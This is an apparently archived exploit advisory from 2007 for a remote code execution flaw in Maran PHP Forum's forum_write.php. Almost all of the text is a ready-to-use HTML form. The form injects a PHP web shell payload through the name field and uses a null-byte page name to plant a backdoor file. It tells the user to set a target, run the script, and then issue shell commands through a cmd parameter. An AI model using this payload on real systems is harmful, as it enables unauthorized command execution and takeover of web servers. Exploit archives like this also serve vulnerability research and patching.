Maran PHP Forum - 'forum_write.php' Remote Code Execution

EDB-ID:

3775

Author:

Dj7xpl

Type:

webapps

Platform:

PHP

Published:

2007-04-22

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+                                               Y! Underground Group                                               +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Portal......:  Maran PHP Forum                                                                          +
+          Author......:  Dj7xpl / Dj7xpl@Yahoo.com                                                                +
+          Type........:  Remote Code Execution                                                                    +
+          Download....:  http://www.maran.pamil-visions.com/maranforum.php                                        +
+          Page........:  http://Dj7xpl.2600.ir                                                                    +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Xpl.........:                                                                                           +
+  <html><head><Title>---===Maran PHP Forum===------===Dj7xpl===---</title></head>                                 +
+  <body bgcolor="red">                                                                                            +
+  <center>                                                                                                        +
+  <form name="AimStats" method="post" action="http://site.com/path to site/forum_write.php">                      +
+  <input name="name" value="<?passthru($_GET[cmd])?>" type="text" >                                               +
+  <input name="page" value="pagename.php%00" type="text" >                                                        +
+  <input type="submit" name="Submit" value="Submit" >                                                             +
+  </form><br><br>                                                                                                 +
+  <font color="#C0FF3E" size="+1"> Please change Target And Run This Script</font><br>                            +
+  <font color="#C0FF3E" size="+1"> Backdoor : http://[Target]/[Path]/data/pagename.php?cmd=shell</font></br>      +
+  <font color="#C0FF3E" size="+1"> E.g  :  http://site.com/forum/data/filename.php?cmd=ls -la</font>              +
+  </center>                                                                                                       +
+  </body>                                                                                                         +
+  </html>                                                                                                         +
+                                                                                                                  +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2007-04-22]